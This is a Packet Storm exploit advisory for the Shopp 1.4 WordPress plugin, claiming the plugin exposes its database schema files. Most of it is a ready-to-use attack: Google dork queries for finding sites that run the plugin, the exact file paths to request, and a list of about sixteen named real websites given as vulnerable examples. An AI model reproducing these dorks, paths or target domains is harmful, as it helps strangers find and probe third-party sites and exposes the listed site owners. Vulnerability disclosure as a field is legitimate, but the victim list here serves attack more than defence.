WordPress Shopp 1.4 Database Disclosure

2018-12-06T00:00:00
ID PACKETSTORM:150663
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-06T00:00:00

Description

                                        
                                            `#################################################################################################  
  
# Exploit Title : WordPress Shopp Plugins 1.4 Database Backup Disclosure  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 06/12/2018  
# Vendor Homepage : shopplugin.net ~ wordpress.org/plugins/shopp/  
# Software Download Link : downloads.wordpress.org/plugin/shopp.zip  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 1.4  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/plugins/shopp/''  
+ intext:''Site by Stellar''  
+ intext:''A(c) 2018 MKJ Marketing''  
+ intext:''A(c) 2018 Spikenard Farm''  
+ intext:''A(c) KHL 2011 - 2018''  
+ intext:''Powered by: Agency 850.''  
+ intext:''Powered by WordPress. Designed by WooThemes''  
+ intext:''A(c) Copyright 2018, by Altrex. All Rights Reserved''  
+ intext:''Proudly powered by WordPress | Theme: Radiate by ThemeGrill.''  
+ intext:''Website developed by Zero Defect Design LLC''  
+ intext:''This Website is Lovingly Crafted and Maintained by Briers Head  
Office Staff in Vancouver!''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/wp-login.php  
  
# Exploit :  
  
/wp-content/plugins/shopp/core/schema/schema.sql  
  
/wp-content/plugins/shopp/core/schema/schema-110.sql  
  
/wp-content/plugins/shopp/core/schema/schema-120.sql  
  
#################################################################################################  
  
# Example Vulnerable Site =>  
  
[+] happyseamstress.com/wp-content/plugins/shopp/core/schema/schema-120.sql  
  
[+] spikenardfarm.org/wp-content/plugins/shopp/core/schema/schema.sql  
  
[+] themeganhouse.org/wp-content/plugins/shopp/core/schema/schema.sql  
  
[+] biggersfh.com/wp-content/plugins/shopp/core/schema/schema.sql  
  
[+] khl.fi/wp/wp-content/plugins/shopp/core/schema/schema.sql  
  
[+] rguns.net/wp-content/plugins/shopp/core/schema/schema.sql  
  
[+] cootersplace.com/wp-content/plugins/shopp/core/schema/schema.sql  
  
[+] briers.ca/wp-content/plugins/shopp/core/schema/schema.sql  
  
[+] altrex.com.au/wp-content/plugins/shopp/core/schema/schema.sql  
  
[+] demon-slayer.org/wp-content/plugins/shopp/core/schema/schema.sql  
  
[+] chocolate-tree.co.uk/wp-content/plugins/shopp/core/schema/schema.sql  
  
[+] growfood.com/wp-content/plugins/shopp/core/schema/schema.sql  
  
[+] danceinspire.co.uk/wp-content/plugins/shopp/core/schema/schema.sql  
  
[+] cootersplace.com/wp-content/plugins/shopp/core/schema/schema.sql  
  
[+] tudorplace.org/wp-content/plugins/shopp/core/schema/schema.sql  
  
[+] arizot.info/wp-content/plugins/shopp/core/schema/schema.sql  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`